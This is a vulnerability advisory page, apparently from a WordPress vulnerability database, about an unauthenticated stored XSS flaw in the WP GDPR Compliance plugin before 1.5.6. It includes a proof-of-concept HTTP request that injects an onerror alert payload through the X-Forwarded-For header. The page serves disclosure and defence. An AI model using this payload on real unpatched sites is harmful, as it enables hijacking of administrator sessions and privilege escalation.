WordPress Plugin Vulnerabilities

WP GDPR Compliance < 1.5.6 - Unauthenticated Stored Cross-Site Scripting (XSS)

Description

The GDPR Compliance <= 1.5.5 plugin allowed unauthenticated users to exploit Stored Cross-Site Scripting (XSS) in the administration panel, which might lead to the privilege escalation. That was due to clients' IP Addresses reflected in the plugin's dashboard without being correctly validated or escaped.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 0.0.0.0:31337
X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>

action=wpgdprc_process_action&security=cccf5a60ec&data={"type":"access_request","email":"xss@example.com","consent":true}

Affects Plugins

Plugin icon
wp-gdpr-compliance
Fixed in 1.5.6

References

URL
https://vavkamil.cz/2021/02/16/wp-gdpr-compliance-unauthenticated-xss/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
vavkamil
Submitter
vavkamil
Submitter website
https://vavkamil.cz
Submitter twitter
vavkamil
Verified
Yes
WPVDB ID
69655879-9fd5-49a3-96ce-81e43b8d8438

Timeline

Publicly Published
2021-03-01 (about 3 years ago)
Added
2021-03-01 (about 3 years ago)
Last Updated
2021-03-04 (about 3 years ago)

Other

Published
Title
Published
2022-12-20
Title
Metricool < 1.18 - Admin+ Stored XSS
Published
2023-09-25
Title
Simple Posts Ticker < 1.1.6 - Contributor+ Stored XSS
Published
2015-04-15
Title
WP Statistics <= 9.1.2 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2014-08-01
Title
Velvet - Unspecified XSS
Published
2024-04-12
Title
Easy Contact Form Lite < 1.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting